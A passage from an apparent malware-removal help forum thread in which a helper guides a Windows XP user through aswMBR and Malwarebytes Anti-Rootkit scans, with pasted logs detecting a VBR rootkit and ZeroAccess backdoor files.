Class Guid: {4D36E96F-E325-11CE-BFC1-08002BE10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/19/2014 06:35:46 AM) (Source: MPSampleSubmission) (User: )
Description: EventType avsubmit, P1 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P2 1.1.10401.0, P3 1.169.70.0, P4 1.169.70.0, P5 unknown, P6 NIL, P7 NIL, P8 NIL, P9 avsubmit0, P10 avsubmit1.

Error: (03/18/2014 10:30:02 AM) (Source: MPSampleSubmission) (User: )
Description: EventType avsubmit, P1 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P2 1.1.10401.0, P3 1.169.70.0, P4 1.169.70.0, P5 unknown, P6 NIL, P7 NIL, P8 NIL, P9 avsubmit0, P10 avsubmit1.

Error: (03/18/2014 07:03:17 AM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (03/18/2014 07:03:16 AM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (03/12/2014 01:26:26 PM) (Source: ESENT) (User: )
Description: wuauclt (49000) An attempt to delete the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edbtmp.log" failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The delete file operation will fail with error -1032 (0xfffffbf8).

Error: (02/23/2014 10:08:07 AM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (02/23/2014 10:08:07 AM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (02/18/2014 01:28:08 AM) (Source: MPSampleSubmission) (User: )
Description: EventType mptelemetry, P1 2152759308, P2 unspecified, P3 scanfile, P4 4.4.304.0, P5 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P6 unspecified, P7 unspecified, P8 NIL, P9 mptelemetry0, P10 mptelemetry1.

Error: (02/16/2014 10:50:39 AM) (Source: Application Error) (User: )
Description: Fault bucket 68557324.
The Wep key exchange did not result in a secure connection setup after 802.1x authentication.  The current setting has been marked as failed and the Wireless connection will be disconnected.

Error: (02/16/2014 10:49:49 AM) (Source: Application Error) (User: )
Description: Faulting application plugin-container.exe, version 27.0.1.5156, faulting module mozalloc.dll, version 27.0.1.5156, fault address 0x0000119c.
Processing media-specific event for [plugin-container.exe!ws!]


System errors:
=============
Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 06:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Percentage of memory in use: 70%
Total physical RAM: 894.42 MB
Available physical RAM: 260.05 MB
Total Pagefile: 2168.02 MB
Available Pagefile: 1130.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1906.25 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:139.04 GB) (Free:82.51 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149 GB) (Disk ID: C9C06833)

Partition: GPT Partition Type.

==================== End Of Log ============================
 


uh oh...

Scan with aswMBR

Please download aswMBR ( 4.5MB ) to your desktop.

  • Double click the aswMBR.exe icon, and click Run.
  • There will be a short delay before the next dialog box comes up. Please just wait a minute or two.
  • When asked if you'd like to "download the latest Avast! virus definitions", click Yes.
  • Typically this is about a 100MB download so depending on your connection speed it can take a short while to download and become ready.
  • Click the Scan button to start the scan once the update has finished downloading.
  • On completion of the scan, click the Save log button, save it to your desktop, then copy and paste it in your next reply.


Note: There will also be a file on your desktop named MBR.dat; do not delete this for now. It is an actual backup of the MBR (master boot record).


aswMBR version 0.9.9.1771 Copyright© 2011 AVAST Software
Run date: 2014-03-20 10:38:39
-----------------------------
10:38:39.828    OS Version: Windows 5.1.2600 Service Pack 3
10:38:39.828    Number of processors: 1 586 0x7F02
10:38:39.828    ComputerName: EMACHINE-98E05C  UserName: Buddy Harris
10:38:40.703    Initialize success
10:39:06.593    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP4T0L0-12
10:39:06.609    Disk 0 Vendor: Hitachi_HDT721016SLA380 ST1OA31B Size: 152627MB BusType: 3
10:39:06.812    Disk 0 MBR read successfully
10:39:06.812    Disk 0 MBR scan
10:39:06.812    Disk 0 unknown MBR code
10:39:06.828    Disk 0 Partition 1 00     12  Compaq diag NTFS        10240 MB offset 2048
10:39:06.843    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       142376 MB offset 20973568
10:39:06.875    Disk 0 Partition 3 80 (A) 17 Hidd HPFS/NTFS NTFS           10 MB offset 312560640
10:39:06.875    Disk 0 Partition 3  **SUSPICIOUS**
10:39:06.875    Disk 0 scanning sectors +312581792
10:39:07.078    Disk 0 scanning C:\WINDOWS\system32\drivers
10:39:13.531    Service scanning
10:39:24.671    Service MpKsl986fd788 c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys **LOCKED** 32
10:39:35.312    Modules scanning
10:39:45.250    Disk 0 trace - called modules:
10:39:45.281    ntkrnlpa.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll atapi.sys pciide.sys PCIIDEX.SYS
10:39:45.281    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x851eeab8]
10:39:45.296    3 CLASSPNP.SYS[f74c7fd7] -> nt!IofCallDriver -> \Device\00000064[0x852ba318]
10:39:45.296    5 ACPI.sys[f735e620] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP4T0L0-12[0x85236940]
10:39:45.296    Scan finished successfully
10:40:41.703    Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Buddy Harris\Desktop\MBR.dat"
10:40:41.718    The log file has been saved successfully to "C:\Documents and Settings\Buddy Harris\Desktop\aswMBR.txt"

 


Scan with Malwarebytes Anti-Rootkit

Please download Malwarebytes Anti-Rootkit from here (Malwarebytes : Malwarebytes Anti-Rootkit) and save it to your desktop.

Be sure to print out and follow the instructions provided on that same page.

Caution: This is a beta version so please be sure to read the disclaimer and back up any important data before using.

  • Double click the mbar.zip file to open it, then 'Extract all files'.
  • Double click the mbar folder to open it, then double click mbar.exe to start the tool.


Check for Updates, then Scan your system for malware

If malware is found, do NOT press the Cleanup button yet. Click EXIT.

I'd like to see the log first so I can see what it sees. You'll find the log in that mbar folder as MBAR-log-[date and time]***.txt. Please attach that to your next reply.


I found it:

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 159211520

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 177180672

Downloaded database version: v2014.03.20.05
Downloaded database version: v2014.03.18.01
=======================================
Initializing...
------------ Kernel report ------------
     03/20/2014 16:29:51
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\SystemRoot\System32\Drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\sr.sys
\??\C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\aswMBR.sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR5
Upper Device Object: 0xffffffff85124120
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000071\
Lower Device Object: 0xffffffff85250030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR4
Upper Device Object: 0xffffffff84e9e2d0
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84ed9d08
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff851eeab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff85236940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85237900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852ba318, DeviceName: \Device\00000064\, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85236940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072

    Partition 2 type is HIDDEN (0x17)
    Partition is ACTIVE.
    Partition starts at LBA: 312560640  Numsec = 21152
    Partition is not bootable
Infected: VBR on Hidden active partition --> [unknown.Rootkit.VBR]
Physical drive 0 is not bootable
Bootable physical drive, other than a system drive has been found

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

MBR infection found on drive 0
Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85030718, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84ed9d08, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85250b78, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85250030, DeviceName: \Device\00000071\, DriverName: \Driver\USBSTOR\
------------ End ----------
Infected: C:\WINDOWS\system32\c_68825.nls --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\@" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\loader.tlb" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@00000001" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@00000001 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cf --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@80000000" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@80000000 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cf --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\2860961191 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\@ --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\loader.tlb --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\l --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\u --> [backdoor.0Access]
Scan finished
 


Fix with Malwarebytes Anti-Rootkit

Run another scan with mbar.exe and click the CleanUp button. It will require a reboot.

When it has rebooted, run another scan with mbar.exe and click CleanUp again if necessary.

Send the mbar-log.txt along with an update on machine behavior.


No malware found. I plan to post the log now and restart the system to see how everything is working.

Is that the correct thing to do?

 

 

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 159211520

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 177180672

Downloaded database version: v2014.03.20.05
Downloaded database version: v2014.03.18.01
=======================================
Initializing...
------------ Kernel report ------------
     03/20/2014 16:29:51
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\SystemRoot\System32\Drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\sr.sys
\??\C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\aswMBR.sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR5
Upper Device Object: 0xffffffff85124120
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000071\
Lower Device Object: 0xffffffff85250030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR4
Upper Device Object: 0xffffffff84e9e2d0
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84ed9d08
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff851eeab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff85236940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85237900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852ba318, DeviceName: \Device\00000064\, DriverName: \Driver\ACPI\
